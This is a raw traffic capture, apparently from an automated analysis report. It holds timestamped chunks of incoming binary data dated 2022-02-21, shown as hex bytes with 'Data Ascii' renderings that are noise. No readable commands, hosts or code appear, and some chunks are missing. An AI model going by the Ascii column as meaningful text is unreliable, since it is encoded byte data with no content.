                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC89INData Raw: e8 25 59 ba c6 26 56 a2 5b d2 6b 13 c2 5f f7 7f 55 1d 33 9e ac fc 76 71 4b 1a 08 dc 4e 5a 58 6d f7 09 a7 70 0f 1f d7 45 38 fa 11 49 54 e4 03 53 70 11 ce fd 34 29 33 53 0e 05 b7 2f 0e c9 36 b4 40 57 bc 5e 37 a7 a1 56 11 ea 06 9f 41 54 7c 9d b0 d5 e1 04 b5 d4 3d 42 bc 2c 26 d6 f1 9f cd 5b df 61 db a2 67 90 df 29 11 86 16 4d fe 01 e2 20 e1 de 42 e5 8a de a6 5b 3f 06 ed 9d 19 eb dd b3 6a cc 16 aa f5 94 49 3c b6 f4 29 1b 1a 50 a5 a9 96 f9 2a df 8c a6 2e 82 c0 ab f8 60 03 88 b8 7e 9f 3d ea 62 c1 fe af 1d c1 a8 d0 86 6f ab f1 e9 f4 58 c6 4e 1b b8 d4 8f 9f 18 1e b0 a0 b7 26 00 f0 78 14 47 02 5f 1c 31 b8 3b d2 54 b3 fd a7 a1 0c 49 7a 50 57 f2 dc 4e 60 4e a5 09 d7 a5 03 aa 77 aa 0c 4e 1f 9f ec fd c4 fc 8e cc f9 16 f1 f1 08 87 30 90 7f d5 05 de a0 2b 24 b8 a1 7a 9f
                                                                                                                                                                                                                              Data Ascii: %Y&V[k_U3vqKNZXmpE8ITSp4)3S/6@W^7VAT|=B,&[ag)M B[?jI<)P*.`~=boXN&xG_1;TIzPWN`NwN0+$z
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC90INData Raw: ff d8 5d f4 63 12 ab 06 12 cf 44 17 ec 49 d6 64 c1 60 03 e8 7d bb 49 77 a2 f9 d2 40 ce 36 2a 22 10 b0 78 b2 bb e7 40 97 0e 9c b5 c1 aa 8b b2 2a ee 45 93 89 87 44 e6 8d 1c 8c 9d d1 a4 8d 0a 47 2e 15 33 00 86 de 32 68 26 14 b2 65 9e ce ee 65 d3 f3 dd ff c6 83 64 31 73 8b cf b0 cc 3f 5c 12 bb 98 aa d5 74 c5 51 45 0b da 35 fb c0 5d eb 69 03 49 0e 4c 8f 01 7d d6 a7 8e 7d 8a ec 81 46 e4 a5 3d 1f 02 d8 76 45 3c a1 d8 d2 66 bb 1e 1f 56 fd aa e2 31 fd 7e 76 23 02 54 4d bd cd 11 cd 5d 2d 16 f4 65 5c 47 f4 4b 60 56 d3 08 52 46 5b 9e 84 40 17 ea 93 a2 70 79 c8 e6 9a d9 7b d8 f5 4a e6 15 19 ba 02 74 d8 34 db d4 5e 08 40 b3 87 8f a0 13 54 cf 4e 96 fd 68 a2 9d b7 4e 4a ba 39 37 bb 64 10 59 3f 7d 18 fb a7 25 5a 27 59 84 55 a0 af bf 70 55 57 6e 65 60 3f 74 9a 58 1e ec d0
                                                                                                                                                                                                                              Data Ascii: ]cDId`}Iw@6*"x@*EDG.32h&eed1s?\tQE5]iIL}}F=vE<fV1~v#TM]-e\GK`VRF[@py{Jt4^@TNhNJ97dY?}%Z'YUpUWne`?tX
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC91INData Raw: b1 db c6 29 93 4a ad 38 eb b2 f9 c1 c5 2a 3a d9 a2 1d 0c 07 45 eb 1a 4c 33 99 31 a9 48 3d f1 62 a1 ab 21 8e 33 f7 ce 49 9b 4d fa 28 b8 30 7b bb e4 3a 7a 59 f2 43 35 eb eb e2 2f 1a 7f 1f 72 76 50 96 0c 9c 00 eb fd 4d 4f be 3f 6e cf 5a 3e c5 3c fe c1 81 07 40 69 51 7e 62 75 f1 40 7d 42 3c 10 b8 f2 5c 03 b9 4e e3 cf 6e 0d b4 f9 ec 7b 07 d2 4c df 00 57 e7 0e f7 7b 50 72 fc f0 4f cf 8a c1 9c b9 85 a4 72 4a 3a c2 d1 0b c8 07 62 e4 22 6e e9 b1 1e 39 44 fd 49 10 07 8d 73 1e ca ea 56 79 b1 5a 27 79 8c d3 ef 65 aa e4 03 81 f0 c4 4c 7d 6d 86 cd 49 39 d6 4e 55 99 0a dd b4 76 ab c3 a4 12 11 0b 6e 14 1b 92 d8 59 8d 9a 1d 2a 7e 66 63 c9 da a7 1c 9b 3a 96 6d c3 c4 a1 c6 d6 25 86 1f d7 56 18 22 65 e6 06 c0 3a 13 3b 68 c3 83 59 26 bd f5 7c 6a 9c 89 1f d3 51 28 de 27 c3 1f
                                                                                                                                                                                                                              Data Ascii: )J8*:EL31H=b!3IM(0{:zYC5/rvPMO?nZ><@iQ~bu@}B<\Nn{LW{PrOrJ:b"n9DIsVyZ'yeL}mI9NUvnY*~fc:m%V"e:;hY&|jQ('
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC93INData Raw: 99 37 c7 c0 8a 7e 3b f1 22 3f 87 85 ef 73 f2 12 6f 1a ad 29 6a 6c e2 1e 68 15 8f 92 65 66 81 a8 6a 79 11 b6 fb 8e a8 b5 48 51 f7 c9 90 7c f9 be 5f 41 52 e5 88 d2 44 25 79 a0 0e 7a 52 8d a4 44 ee 76 f9 4d db ae 5e 18 56 57 c8 6b fa bb ee f6 62 1e ae 96 88 0e 64 54 d6 ac b5 c9 80 82 c8 18 ae 6a 36 dc 6b c2 eb c3 77 25 4f 1b 33 39 94 bf 33 76 da 7f ce 88 cf d8 6f ab ae 6a 01 66 1d b2 e7 46 78 3b ed 77 af a6 b9 f7 1b 7c 55 5c b2 c2 92 66 25 40 b3 61 a7 6c b4 80 c7 79 65 f6 a6 9f ab ca 09 9c 14 07 61 fa 85 de 75 5f ab 34 ee 38 ef 5f 52 57 c2 85 f3 f0 ea 0e 0d 50 80 67 2c 67 5d 2b 2f 34 bb 74 2c 28 df 35 cf 47 94 2b 8a 0e f0 99 76 a0 f2 6c 7f 48 4b 22 0c 63 b7 e5 23 87 90 ba e7 63 99 15 10 3a 5b bb ac 35 94 c1 ac e1 4d 67 94 54 99 ac 56 dd 2c 48 67 ab 78 8c 08
                                                                                                                                                                                                                              Data Ascii: 7~;"?so)jlhefjyHQ|_ARD%yzRDvM^VWkbdTj6kw%O393vojfFx;w|U\f%@alyeau_48_RWPg,g]+/4t,(5G+vlHK"c#c:[5MgTV,Hgx
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC94INData Raw: c2 7a 14 c8 10 ff bf 6d d0 30 e9 2e af dc e7 ac ae 5f 61 d7 e3 0d c1 6c ec 7b a9 d4 4c f8 76 57 e7 e9 73 21 d0 a5 78 f5 a4 f4 71 6c 49 d0 2d 8a 8d 36 f1 7c 84 53 78 0a bd ec 53 fa e9 b1 b1 81 32 76 76 10 57 8d 72 ef 5e ea 56 d7 bf 08 e7 39 64 81 fb 8d 10 29 76 89 40 db df 52 42 65 91 cf 46 a4 20 ae e9 bc 22 dd be 33 a6 e0 ed e1 02 3d ee e6 6d aa 5d a8 66 f7 69 96 8f 0d 21 eb d9 dc f3 bf 50 75 a9 95 46 06 a1 5c 81 1d 79 cf c1 f1 75 57 bd c0 2d 80 8b 90 3e f7 30 d3 24 4b b8 7a 4b e1 c0 38 5b 65 8c cf 12 22 fe bd ce 17 af 15 2a 68 c6 e4 17 64 90 c8 51 50 a3 78 32 e6 c7 2d fa 1c 0e 18 3c 51 df ff bf 1c ca 1a d6 34 62 44 29 4f b1 ce ad d8 f5 af f2 7d 86 56 49 cb 7a 0f fb ea 86 8d 3f 49 ec f7 38 c4 50 aa 4d 46 e1 38 1f 14 7a 40 7c 26 09 69 6a eb 3a e9 a6 c0 cb
                                                                                                                                                                                                                              Data Ascii: zm0._al{LvWs!xqlI-6|SxS2vvWr^V9d)v@RBeF "3=m]fi!PuF\yuW->0$KzK8[e"*hdQPx2-<Q4bD)O}VIz?I8PMF8z@|&ij:
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC95INData Raw: 8f c2 4a 7a 2d fc 5f 27 ca d5 b8 55 d6 93 28 4e bd ec 40 01 10 d0 b6 67 70 54 2f 5f bb ad 62 48 29 cd 93 14 ce a5 94 de 63 ec c7 61 a6 bd 67 45 c3 61 e7 d1 50 1d f3 24 70 2c 8c d5 bf b5 e3 23 5f f2 a9 d2 5f ca 33 e8 a3 22 9e 04 32 3a 98 72 d0 83 c8 de 56 73 66 cc 4b db 19 5c ae f0 73 51 be cd ad cd 66 02 18 be f8 a5 44 9f 4c 1b e1 4d 8c cb e0 d9 6c b2 6d 88 eb 01 1b 65 8c dc 53 82 3b ad 6c aa bf af c0 3b d9 c2 64 6a c8 79 76 ef 21 7c 7a 15 ea e9 02 fc a0 78 35 9a ae b4 ef c7 2d 4f 6f f2 35 84 2d 7a cf 3b b2 f5 78 37 83 9e 98 23 ca 91 50 60 de 68 ef 0b ea e2 4e ed 4c cf 6d 59 34 ad b5 90 af d8 44 90 67 04 c5 09 82 ca 20 d5 99 9d cb 67 3f 16 dd 86 c9 32 c5 bb 00 76 e4 8e 8c a8 60 30 c5 56 cd ca 36 4b 56 32 6f 51 fd 0f 1a 05 28 8c 7d e6 33 57 68 af 29 04 b3
                                                                                                                                                                                                                              Data Ascii: Jz-_'U(N@gpT/_bH)cagEaP$p,#__3"2:rVsfK\sQfDLMlmeS;l;djyv!|zx5-Oo5-z;x7#P`hNLmY4Dg g?2v`0V6KV2oQ(}3Wh)
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC96INData Raw: 5d fc 0c 26 98 0e 7e 86 c7 33 dc 1f 4f 46 e8 fc a5 a3 27 84 44 b7 e0 be 06 6c d1 ec e6 3e 4f f8 02 0c d9 6d 96 38 1d de 14 67 51 03 e8 ba 20 b7 3a 34 e1 4f 2d 2b 7a 7f fb a0 bd a6 54 bd b2 80 06 35 54 76 2c 4e fa 1b b4 47 f4 d1 11 19 53 ab 67 de 27 ff f6 d0 91 d9 9e 60 40 b2 b1 b8 65 1d 9b 6f 2d ea ad ac d7 7e 20 bf 7a 23 b0 a2 73 4e 2b 3a 4d d8 b2 72 af ca f4 9d c9 f7 41 47 b0 b9 8f 4d 23 53 ea 86 2a 72 aa a8 d5 9a e6 63 d0 fc e4 99 de 81 af 85 b3 1c 40 40 96 19 f1 0d ea 2e ce dc 7f 31 eb 35 d4 97 d5 b8 16 df e6 d7 0b 81 00 10 94 0c 69 78 a6 68 b8 a4 41 e2 2c ad 6b 57 f0 62 e6 f9 c1 be b0 c9 2d 5b ad 64 e5 19 10 4c 61 84 28 ec b6 55 96 ee 89 15 8f b5 77 d2 59 95 53 85 f3 9e 4d 46 14 16 4e 74 23 1b 15 2c 19 0c fa ee 3b f4 1d ae 1d 50 e1 4a e1 9d c4 d1 80
                                                                                                                                                                                                                              Data Ascii: ]&~3OF'Dl>Om8gQ :4O-+zT5Tv,NGSg'`@eo-~ z#sN+:MrAGM#S*rc@@.15ixhA,kWb-[dLa(UwYSMFNt#,;PJ
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC97INData Raw: ee 81 09 7b d2 0e 39 1b be d4 e2 8c e3 3e d2 cb 4c a7 49 04 6f 64 6a 67 bc a7 e1 95 9f bd 6c c5 94 37 9d 3c 32 e7 b7 5c a6 88 c9 c4 67 a6 57 83 2f 18 c4 1a ef d2 d9 4b 94 7c fc db 1c 08 cb 9f 26 68 9b f3 9a 37 e2 ca 54 53 78 36 6a a1 a3 45 9d 1b aa 5a af 54 8e 12 56 00 fe ea 65 42 41 7c 21 cc e3 3e db 3b f0 90 10 a2 80 45 63 5b 03 c8 c1 09 91 e0 fe 1e c3 20 f2 99 2f dc 20 ca e2 ec 60 be ea 60 2a 8e e4 72 ec e9 5b 26 c4 81 08 f0 f0 11 c9 b6 a4 cf cf 20 22 29 4a 67 9b a0 7e e2 1b 69 1e fd c8 67 cb 7a 15 16 f3 68 b7 39 5f 11 b9 0e 45 f1 d9 76 1f 8b 34 ed 9b c7 9a de 94 c2 76 e8 a8 f0 a3 a6 b9 c9 46 89 f6 cc 5f 5e 24 92 00 ed a2 6c 8c a7 cb d5 34 95 48 ff bf b3 5d b7 29 21 4d 6e a2 1e 50 2e fd 97 f6 76 b8 50 ad fe df f4 93 4c 84 b5 e9 fa 4c 39 c3 fe d8 81 28
                                                                                                                                                                                                                              Data Ascii: {9>LIodjgl7<2\gW/K|&h7TSx6jEZTVeBA|!>;Ec[ / ``*r[& ")Jg~igzh9_Ev4vF_^$l4H])!MnP.vPLL9(
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC98INData Raw: 6d c5 b7 93 bd e0 ed 0c cb 0b c3 b9 ed 0b b4 cd 6c 3b a3 01 f0 26 4a f7 a1 f9 0e 95 dd a3 7e 7d 5b 87 30 6b c6 18 c9 c7 2c 51 a0 16 cd b2 20 2d c1 fe d0 bb 55 59 72 5b 0e d1 99 d8 60 10 c5 60 c3 82 45 4c c3 1d 71 31 3c 53 eb a7 5d 95 c9 d2 6b b9 6e fb a8 8e 28 b3 b7 68 73 6b dd 5d 13 25 b7 e3 53 d7 8d b4 43 27 c1 9b b9 e6 5a ca c1 87 d7 a7 67 c0 a0 68 4a bb 9b db be 3a 48 f2 4c 45 d0 d5 a7 31 8a 13 d4 a7 82 70 c3 9f 48 3a 6e 41 5c 2f 2e 7a 1d 60 6a 0c 6c 50 4b 51 ba 16 73 e1 87 ea b9 c7 29 ee 16 a5 6e bd 9a ad 7b bb 90 c9 0e 57 99 87 2d 50 0b f2 35 84 29 74 15 f3 eb 76 6f b6 f9 96 e4 9a 29 06 b8 1f f4 79 fe d3 28 a7 3f 37 e5 50 b5 ae 94 0c bc f3 1f be 87 5c 20 27 6a 66 15 84 4c ad 90 84 f2 eb ed 26 c5 bf c9 9b 1e 26 31 27 e6 d9 86 6a 84 81 8e e4 3a f1 b8
                                                                                                                                                                                                                              Data Ascii: ml;&J~}[0k,Q -UYr[``ELq1<S]kn(hsk]%SC'ZghJ:HLE1pH:nA\/.z`jlPKQs)n{W-P5)tvo)y(?7P\ 'jfL&&1'j:
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC100INData Raw: 5c 13 43 57 00 7d 2a 34 45 24 ae 0b cd e3 68 dc 3b 7f 5c ef 5d 80 45 7f 6a 48 7e df be cc 23 f6 9b c9 fd e5 33 69 e5 20 43 e1 08 45 3f 79 1c 6f 22 61 79 83 e5 51 1a 6e f5 8a b2 cd c3 b9 97 c6 b1 04 22 c1 c5 eb 8b 5b f3 96 bb 0f a9 48 ff 7d fd 11 b6 b0 62 5e fd c5 83 59 f6 f6 3b ba 79 9c df 22 3a 08 8d f0 21 56 e1 39 f8 ca 61 ed 1d 2a 0b e2 5e 03 64 1b 30 0a f9 25 92 03 e4 e4 88 74 58 34 b0 51 22 49 ff cb 1b 19 36 c1 8e 9d 31 b5 52 50 26 26 95 ad 72 2e fd 43 8c b6 9a 74 4f c9 32 d8 d6 b4 fc 59 78 87 b9 44 c6 f0 cb bc c0 4e ed 2c 63 63 22 bf 00 66 60 b7 1f e0 dd 3b fd 98 46 30 0d 4c 15 00 28 56 9e 87 b0 80 13 32 be 2d 46 dc 6d 36 06 89 92 43 9f 5f 48 71 9e 36 76 9b 8f 98 0b 35 ac d5 c8 86 39 c2 69 8e e3 15 b4 df 20 ea d0 3b f8 a2 51 45 c4 00 b9 db 1c 98 e5
                                                                                                                                                                                                                              Data Ascii: \CW}*4E$h;\]EjH~#3i CE?yo"ayQn"[H}b^Y;y":!V9a*^d0%tX4Q"I61RP&&r.CtO2YxDN,cc"f`;F0L(V2-Fm6C_Hq6v59i ;QE
                                                                                                                                                                                                                              Data Ascii: ~hLNc{Y"n_hrA<9S9d32mQKLgVQ@K@DiTd[n^AG69t1-D6_jTyrQpdduRg|(`t>x qUM+S6VxJ;^s}#pHJm@L1q@#p;~U."
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC135INData Raw: a4 e6 17 36 90 fd 5c 12 3f 80 94 df 6a 32 ed 4b 65 b2 da 6c 42 68 81 6b e8 50 87 fd 7b e3 a4 00 4e 94 e4 61 7a 32 7d 27 5e e7 bb 6b 87 90 be 3b 2f e8 f9 38 6d b2 86 35 ea 0f e2 59 22 ce 5c f3 ef 93 5b c9 de 9f 1a 39 4a 0a a0 dd e0 13 3e e2 80 4e aa 41 e2 b8 14 4f 85 5f 33 3e a4 54 38 6d 89 3d 60 05 76 39 f1 b8 bb 90 f7 9c c0 3a 8e 70 11 fa 90 63 ec 54 5e 07 45 29 3d 34 5c d5 ac 99 e9 c8 48 c1 1f 0e 36 4b 05 ac 7c c4 af ac 8b 01 5b e6 c6 a5 84 ad 1c 63 d0 8c f5 6e cb d1 7f cd 3e ae a8 dd 0f 5b 1c b2 11 c9 80 56 80 7b 4a 90 fb 05 2b b3 38 6a ce 08 03 5c 3b 3a 23 2c a9 29 01 c4 09 56 b5 ba c8 64 36 36 a2 0d ee 44 59 c8 58 2b f6 d8 a5 49 a5 ab fb 77 f4 57 50 08 ba 46 87 67 7b b2 0f f9 6c 23 05 b2 77 d0 7f 07 dd a9 b6 99 9f b7 ec 5c a9 8a 78 2e c8 8a c0 26 f3
                                                                                                                                                                                                                              Data Ascii: 6\?j2KelBhkP{Naz2}'^k;/8m5Y"\[9J>NAO_3>T8m=`v9:pcT^E)=4\H6K|[cn>[V{J+8j\;:#,)Vd66DYX+IwWPFg{l#w\x.&
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC137INData Raw: f4 3a ce 1d 95 16 91 2b fa 17 20 56 6c 8a 21 b8 63 03 d3 4e 3e 22 54 2f 67 88 29 31 4e 2c 66 ba bc 8a 6c b9 53 ec 74 ea c8 f4 35 e9 40 d6 3a de cd a7 15 24 f9 d4 86 6e 90 b5 19 ef 81 ed 4d e0 f9 97 fa 23 1c e2 d5 2f 38 44 d8 92 2c d3 0f d0 5e 07 0f 79 29 90 0f 1f 9e 23 e4 8e 43 59 be 4a 9d 36 cd 89 79 3b 19 81 07 6c dc 97 b3 d4 45 9e 7c 20 24 b8 3f 8a bb 38 56 ef 5a f5 51 ae b8 31 b2 cb 4c 9c b6 e4 7d 49 84 90 f3 0f 4c 91 44 6a 6c 0d 95 bf 7a 0f 37 93 2f 91 ae c4 da a9 e6 16 99 2e b4 46 80 bd ef d0 a7 c4 52 35 96 68 4f de bf ad 1d 4b cc 54 3f c4 cd a2 2e 9b 6a 20 a5 fa b5 67 d8 7d ab ee 69 9b f3 65 57 01 12 9b 03 13 d5 ca 1f 9e 0c 44 01 1a 6f be 1b bc 19 20 1f a8 9d 4a ed f9 4f 06 ba be 07 ed 57 35 ac 70 37 ac 51 11 41 09 51 3f 24 05 1c 5c ee 99 89 fb 95
                                                                                                                                                                                                                              Data Ascii: :+ Vl!cN>"T/g)1N,flSt5@:$nM#/8D,^y)#CYJ6y;lE| $?8VZQ1L}ILDjlz7/.FR5hOKT?.j g}ieWDo JOW5p7QAQ?$\
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC138INData Raw: 8f 19 f2 24 fd 49 f3 5b 9e e5 d7 91 ee 7e f9 7a 96 e0 3e 1d a3 c4 5f 00 a1 9d 8f a9 74 60 04 1c a7 6c 4a 8e 55 e1 1e c5 8f a8 d1 a9 cd 65 6b 76 39 50 60 ff fb f1 db 37 d4 7d dc a4 e7 b4 29 bf ca bd d4 a3 3a 96 f0 66 cd bc 91 3c 34 a9 55 a9 3b cb 45 59 c6 3f 80 5f 39 e7 3a d1 77 aa e5 b2 23 f2 b7 06 bf 15 59 3d f6 b2 87 58 af 9f 48 02 7b 95 d6 3e 54 69 ad 93 da 68 66 08 1b d2 69 46 94 74 89 8c 5c e4 2b 18 4a a0 58 a9 ad f5 73 54 51 1d e8 48 95 6c 9e 13 fa 7e 2e 1e a6 cc ad a1 44 d5 27 92 7f c1 2b 8c 8a 29 19 7f 6b 64 21 3f 15 ef 1f a3 e3 8b 5b 13 b8 9d 39 0a 00 c2 d0 d6 c4 e7 f4 40 5f a6 d1 f4 e9 39 18 30 48 e8 cd cb 03 28 31 99 80 aa 28 91 a5 0e 48 a8 83 79 98 0b 46 a4 bb 13 fe bc bf cf eb cd 70 27 1a e0 62 d3 49 c0 ce f0 cc 7d 22 0d 47 37 0e a3 7f 8e 38
                                                                                                                                                                                                                              Data Ascii: $I[~z>_t`lJUekv9P`7}):f<4U;EY?_9:w#Y=XH{>TihfiFt\+JXsTQHl~.D'+)kd!?[9@_90H(1(HyFp'bI}"G78
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC139INData Raw: 78 0d 0a 6e 22 7d 62 fa 3b b2 8c ae ae 9e cc 28 01 0d 5a 0e c4 25 82 0b cb cc 0e 5b f6 d4 a1 fe 2d ae a6 0c c2 1b f0 19 e8 97 8e 00 c5 ac 41 b1 09 42 18 de 25 9e 73 ae 1c 39 d8 5b db 23 b9 e5 ad 98 32 f2 f3 72 75 84 79 75 98 03 33 93 ec 73 7e e2 97 23 ba ee 71 cf b5 85 b3 6d 7b c9 07 a6 f1 2a a2 19 a2 01 9e ad 50 cf 5b 81 3f 6d b7 c6 a6 f3 fb 83 b2 57 cd a0 62 be e0 2a ba bd 9a 02 c4 75 8f 09 8d cb ea 51 e5 61 40 3e fd da 36 ca b7 4a 0c 20 34 c4 f5 a1 cc 9f 2d 8b 56 f2 bc 38 a0 89 25 19 66 4d e3 2f 38 56 81 da 5d 54 42 b7 64 15 bb e3 e2 39 79 1a bb f0 51 d6 27 19 7d 96 c4 80 f9 9f d4 80 08 ed a7 dd 9e 5f e0 6f 9a 17 7c c8 0c 31 45 31 76 1f a4 fe f1 e8 4e 78 d1 8b 09 35 27 47 a3 c2 ca 4e 6a 0a c3 2d 9e 90 cd 9c 62 f9 c7 d6 94 ef e7 4a b2 15 fc 76 76 38 a8
                                                                                                                                                                                                                              Data Ascii: xn"}b;(Z%[-AB%s9[#2ruyu3s~#qm{*P[?mWb*uQa@>6J 4-V8%fM/8V]TBd9yQ'}_o|1E1vNx5'GNj-bJvv8
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC141INData Raw: 6d e3 95 15 cc b5 1e 15 bb ae be e0 43 0b 09 37 ef cf 06 2b 6c 6d bf 56 57 20 03 ae 26 6c e2 66 7b 36 2b a3 64 f1 4e 3c 6f 8b b8 11 25 a7 30 39 4e b5 f2 e6 6e 54 81 b2 dd 2f 6a 4a 43 50 71 c2 73 3a f7 6c b3 b1 9d 93 d4 f6 77 b2 b5 03 ae 66 df b2 11 aa 43 cd c9 d5 7d c3 c4 63 89 25 ea cf 66 ac f5 8a f3 a1 8d 1e 07 f6 b6 91 7e 77 e7 13 8e ab 1d 21 33 7e f5 f3 ba 08 4c 6c 02 62 92 fd 30 94 52 2e eb ee 80 52 06 31 cf 41 61 88 5c 91 56 f7 14 de fa f6 79 91 a2 a0 be 82 c5 1b 3b f0 7c 0d 77 1c 2b 13 78 f7 03 e2 b4 1d 58 ca 47 ca 7c 97 c8 e0 08 47 32 b0 46 55 c6 5d ad 34 18 92 23 c8 9f 34 2b 81 25 c5 d5 9e 05 d9 ec f2 60 c8 c3 23 28 fe cf 08 94 6d bb 52 3d d3 5c a7 c9 2e c5 a1 18 f6 5e 50 62 6f 5e e7 cb 88 d2 f5 90 18 fc f0 0f ab 34 13 8a 24 a0 55 31 e7 b6 77 20
                                                                                                                                                                                                                              Data Ascii: mC7+lmVW &lf{6+dN<o%09NnT/jJCPqs:lwfC}c%f~w!3~Llb0R.R1Aa\Vy;|w+xXG|G2FU]4#4+%`#(mR=\.^Pbo^4$U1w
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC142INData Raw: bb 98 3e 7b 8f a8 81 8a 1d e7 bd b2 61 83 cf 69 eb 22 74 8d 4b 4a d3 8f 43 f1 55 a0 69 1e 0d 38 b0 4e 05 34 36 67 66 de 42 68 f4 91 c2 5f 69 04 0c 69 9b b7 d3 53 b6 8b d0 e9 6e 6d ca 8b 95 7d 57 6f 75 88 30 97 0f 16 60 ff 85 04 44 8a 01 e8 52 58 4a 3e d6 c9 0a 30 21 e8 4f af 89 83 d8 fe 01 06 af 27 db 9a e6 9d bc 4b b9 87 68 63 20 1b 98 22 1f 6f a3 ae e4 17 26 d4 ab cf 0d fa 51 3e 0a c1 2b 13 c7 c3 7c ae e0 58 04 38 2a 1e a5 f6 49 9a 29 71 7b 4a 51 fb 20 1f 0b 8a b6 ea 5d d4 6d 06 42 b4 11 54 9e 7e 86 4e 60 a1 59 80 80 16 92 d7 56 30 38 61 f9 af 3c 82 16 c4 80 dd 28 22 8b f6 a1 5d cc 28 3d 0a 76 15 f3 e4 a7 43 18 8b 1c 47 10 30 41 9d 3c dc 46 97 c2 67 ec fa 09 e8 fe b1 4b 10 13 7c 03 c2 97 24 a4 df f9 2b 55 85 24 6d ea 16 bc cb 85 3d d4 74 e3 9f b1 57 2e
                                                                                                                                                                                                                              Data Ascii: >{ai"tKJCUi8N46gfBh_iiSnm}Wou0`DRXJ>0!O'Khc "o&Q>+|X8*I)q{JQ ]mBT~N`YV08a<("](=vCG0A<FgK|$+U$m=tW.
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC143INData Raw: 3d 75 c5 aa 8b 4b 32 6f f8 ce eb 64 31 b9 4f ac a3 c2 96 6f 2f 0a cc 50 72 76 0a a5 f5 b0 23 e3 89 0f 54 10 2d 86 26 de 00 ff 1d 0f e6 a2 55 90 98 05 2d a5 5e e4 9a dc 68 11 50 c0 3a 56 96 f3 9f 28 d2 77 dd db 4a 1f 88 e3 bf cf 7d f1 0f ee 31 93 6c db c2 a8 82 ea 05 e5 f9 30 3d 59 94 d2 fc 83 f4 72 25 24 35 5a 79 38 48 2e e7 1c 0a e0 0b 3b 85 ff de 91 6d 91 0f 3d a5 2f ff 76 39 7a 19 08 bd c0 5f 9e 67 7b be c8 eb e1 19 b1 4a e0 f6 2b ac ca e6 71 b9 bc 8e ad 26 49 a7 f2 3b ca c1 55 47 43 13 49 76 02 2c 6b 6e 6c 12 94 cc 21 b3 68 c6 1d c0 90 2e c3 20 dc 4b b6 92 ed c7 2f 4b 62 2f 44 f1 8b b8 b7 39 9f 9b 03 09 ee e2 65 13 59 a1 0a 67 8c 39 27 43 18 11 12 4a dc 18 65 1b 7a c3 fd 84 7a eb ff 29 c1 63 1b 57 cf 72 1f db 5c 46 ff 7c 42 d8 00 78 53 00 34 f3 28 88
                                                                                                                                                                                                                              Data Ascii: =uK2od1Oo/Prv#T-&U-^hP:V(wJ}1l0=Yr%$5Zy8H.;m=/v9z_g{J+q&I;UGCIv,knl!h. K/Kb/D9eYg9'CJezz)cWr\F|BxS4(
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC144INData Raw: 59 45 24 26 e0 cc 47 19 41 3a 0a a1 76 d3 2e c9 00 b6 8d c6 58 bc bd 47 67 6f 1c 1f 73 6f 3e 5f 5a c9 75 8d d6 d4 1b 2f 34 2f 7e 6d c8 85 3c 1e 02 7d 0a 18 51 e7 58 de 66 67 21 56 0d 60 a1 23 bb f4 d2 6d f8 4a ac 51 44 db be 97 55 a7 c0 48 07 9d 72 09 d5 00 ee 4e 1a aa 68 b1 45 d6 76 f6 54 f1 85 d7 24 54 da a8 28 60 a2 de 7c 82 f5 b3 bd 8e d6 9a 88 0a 99 e3 3d 8e e0 ed 5e 00 a9 31 b7 22 36 d5 3c 96 75 32 c1 0b 77 78 f6 9e 41 98 86 53 c5 53 81 2f 10 a2 5a f9 99 c8 d0 2b 1b 54 d2 fb d6 09 38 64 41 e8 7d 16 da dc 3e 7e 4b 7a 6c e7 d0 a9 94 f2 06 82 e3 c1 e4 c6 60 6e df 50 a2 9a de 1e 9b 79 67 06 97 6c ae 5c 38 4c c6 b0 84 73 2a a2 e6 c4 fb 5c 1f df c5 84 4b 78 da 27 ab 5f 6f 95 d8 b4 e7 62 10 23 cf de a7 21 66 12 0e e9 bf 18 5b 7c 38 6c 45 d6 04 22 56 cb 6a
                                                                                                                                                                                                                              Data Ascii: YE$&GA:v.XGgoso>_Zu/4/~m<}QXfg!V`#mJQDUHrNhEvT$T(`|=^1"6<u2wxASS/Z+T8dA}>~Kzl`nPygl\8Ls*\Kx'_ob#!f[|8lE"Vj
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC146INData Raw: 0c 17 ba 11 6d 08 05 00 f5 21 98 5c 2c f6 b6 f3 d0 1d ab 0c 51 db 23 9a 50 aa 31 d2 25 19 23 79 8d f4 b1 28 cc 2a 21 c8 f3 8e 94 c2 7e 2b 50 90 29 e0 f7 8d 20 5b a3 90 57 ee 0d ad 91 a9 2a 26 ea 8b e9 25 f0 c3 a7 d9 55 65 8d 90 02 77 5f 84 2e 72 9c ab 79 30 6e f7 64 d9 58 83 6b 27 a9 57 aa f4 f9 1a 5f 04 43 72 d2 92 05 63 5d e9 00 f7 ff 94 03 e5 a9 e4 d7 40 b7 10 0b e8 0b 17 f4 dd df e5 dd 95 94 9d e3 3e 3e fa ff 39 83 37 91 98 2a d4 d0 36 f7 b6 c3 2b 12 26 f7 32 e9 43 14 99 2b 0c 2a 37 74 68 af 5e 7f f3 cc 54 69 bd 08 8f 05 1f 8b 88 dc dd 8e 73 00 ae 80 e2 12 7b bb 42 c9 e9 8e b4 a0 0d 87 ae d0 fe b5 2b b7 4f 9b 41 43 85 31 13 2c 75 a3 4e 70 09 0d ce 4e dd 43 70 40 f1 cf 97 8b 50 3c 35 73 56 e7 73 fb 56 01 18 27 ff a5 82 1c 28 6b 3d 64 ab 2a 14 f4 bc 36
                                                                                                                                                                                                                              Data Ascii: m!\,Q#P1%#y(*!~+P) [W*&%Uew_.ry0ndXk'W_Crc]@>>97*6+&2C+*7th^Tis{B+OAC1,uNpNCp@P<5sVsV'(k=d*6
